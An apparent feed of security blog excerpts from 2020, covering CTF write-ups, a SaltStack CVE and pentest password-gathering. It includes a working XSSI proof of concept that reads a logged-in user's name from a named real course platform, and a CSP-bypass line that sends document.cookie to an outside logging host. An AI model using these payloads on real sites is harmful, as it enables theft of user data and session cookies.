World Password Day 2020 Security News, Insights and Analysis | McAfee 5 years 5 months ago Are Your Password Habits Keeping You Safe Online? Learning how to navigate our entire lives online has definitely been a... The post World Password Day 2020 appeared first on McAfee Blog. Alex Merton-McCann
图解HTTPS原理 独自等待-信息安全博客 5 years 5 months ago 0x01 存在即合理http是非常常见的应用层协议,是超文本传输协议的简称,其传输的内容都是明文的。在这个混乱的世界,明文传输信息想想就可怕,网络“小混混”的手段远比我们这些凡人高明得多,他们有... 独自等待
安卓pwn - De1taCTF(BroadcastTest) NightShadow(奈沙夜影) 5 years 5 months ago BroadcastTest 背景 逆向APK可知程序中仅有MainActivity$Message和三个Receiver类。 前者实现了一个Parcelable类,后三个则是广播。 其中Receiver1是export的,接收并向Receiver2发送广播,Receiver2和3则非export,只能接收内部发送的广播。 功能为Receiver1接收base64传入的data,然后将其反序列化得到... whklhhhh
Demystifying API Attacks Using Gamification F5 Labs 5 years 5 months ago Learn about authentication, authorization, and security misconfiguration in API compromises by exploring this capture-the-flag game.
Demystifying API Attacks Using Gamification F5 Labs 5 years 5 months ago Learn about authentication, authorization, and security misconfiguration in API compromises by exploring this capture-the-flag game.
CVE-2020-11651 SaltStack远程命令执行漏洞 跳动的计算器 5 years 5 months ago SaltStack漏洞背景国外安全团队(F-Secure) 发现多了SaltStack漏洞,其中最严重的两个
CVE-2020-11651 SaltStack远程命令执行漏洞 跳动的计算器 5 years 5 months ago SaltStack漏洞背景国外安全团队(F-Secure) 发现多了SaltStack漏洞,其中最严重的两个
CVE-2020-11651 SaltStack远程命令执行漏洞 跳动的计算器 5 years 5 months ago SaltStack漏洞背景国外安全团队(F-Secure) 发现多了SaltStack漏洞,其中最严重的两个
CVE-2020-11651 SaltStack远程命令执行漏洞 跳动的计算器 5 years 5 months ago SaltStack漏洞背景国外安全团队(F-Secure) 发现多了SaltStack漏洞,其中最严重的两个
CVE-2020-11651 SaltStack远程命令执行漏洞 跳动的计算器 5 years 5 months ago SaltStack漏洞背景国外安全团队(F-Secure) 发现多了SaltStack漏洞,其中最严重的两个
CVE-2020-11651 SaltStack远程命令执行漏洞 跳动的计算器 5 years 5 months ago SaltStack漏洞背景国外安全团队(F-Secure) 发现多了SaltStack漏洞,其中最严重的两个
CVE-2020-11651 SaltStack远程命令执行漏洞 跳动的计算器 5 years 5 months ago SaltStack漏洞背景国外安全团队(F-Secure) 发现多了SaltStack漏洞,其中最严重的两个
【有趣的XSSI漏洞】梦中发现某网课平台信息泄露漏洞 Driver Tom's Blog 5 years 5 months ago 0x00 Disclaimer 由于coronavirus的影响,学校安排我们上网课,可能是由于学习太累,做梦都梦到了上网课了,而且还梦到了一个漏洞百出的网课平台。最近我梦到发现了一个非常有趣的漏洞,在我在梦中发现的这个平台的大大小小的漏洞中,这个虽然不是最严重的,但是是最有趣的。 幸好在做梦的时候还顺手截了图,这才能够跟大家分享。本文所述内容纯属意淫,如果您在现实生活中碰到了长得相似的系统那完全是巧合,和本人一丢丢关系都没有 0x01 漏洞发现 在睡梦中闲来无事抓个包,发现包里面居然有很好玩的内容 什么,一个疑似JS的文件里面包含了我的名字? 赶快翻上去header,发现了这个 这说明了什么?这个头指示浏览器把这个请求回来的东西当作JS代码,由于JS可以允许跨域,攻击者可以在html中精心构造JS来访问这些信息 0x02 漏洞原理成因背景 笔者很懒惰,发现先知社区讲的更好,就直接贴上链接了:https://xz.aliyun.com/t/7204 0x03 漏洞POC编写 这里面所有的信息都是被document.writeln包裹起来了,但是我们可以通过覆盖这个函数实现获取信息而不是傻乎乎地把信息写在页面上。基于这一点,我们可以很容易地写出POC代码 <!DOCTYPE html> <head> <meta charset="UTF-8"> <title>!!!</title> </head> <body> <h1 id="msg" style="color:red"></h1> <script> name='' islogin=1; document.writeln=function(text) { match=text.match(/zt_u_name">(.*?)</) if(match !==null) { name=match[1]; } if(text.search("http://passport2.chaoxing.com/wlogin")!==-1) islogin=0; } </script> <script src="https://3wfy-ans.chaoxing.com/passport/allHead.shtml"> </script> <script> if(islogin) msg="X星XX通并不存在什么信息泄露漏洞。是吧,"+name+"同学?"; else msg="你还没有登陆X星XX通,这我还怎么装逼啊?" document.getElementById('msg').innerText=msg </script> </body> </html> POC实测效果: 源码懒得放在github了,想要的自己复制自己玩 0x04 对漏洞的一些思考 或许可以整个扫描器,搞多个不同的用户,爬取后对比JS区别,自动化发掘这种洞? 又或者像个办法来自动搜集JS里面的敏感信息? DriverTom
渗透测试中如何去套路到你想要的密码 - don0t Donot 5 years 5 months ago 密码和口令是通往权限和控制效果的重要途径,通过获取目标的重要系统口令或口令设置规律,能够有效的实现横向移动和重要的权限提升,因此密码/口令在渗透测试过程中被作为重点关注对象,比如在我们获取某目标系统的Webshell时,往往会第一时间查看数据库配置文件获取数据库账号密码,进而可以有效的访问系统数据。那么除了通过配置文件的方式获取密码外,在渗透测试的过程中还有哪些途径可以获取此类密码呢 don0t
iframe绕过csp - Afant1 博客园_Afant1 5 years 5 months ago 看csp规则,默认是在当前域内,允许执行内联js。如果这是一道ctf的话,就很简单了, window.location.href='http://aa.xxxx.ceye.io?'+document.cookie;能把cookie传出来。 但是要是远程加载js文件是不满足csp规则的。 iframe Afant1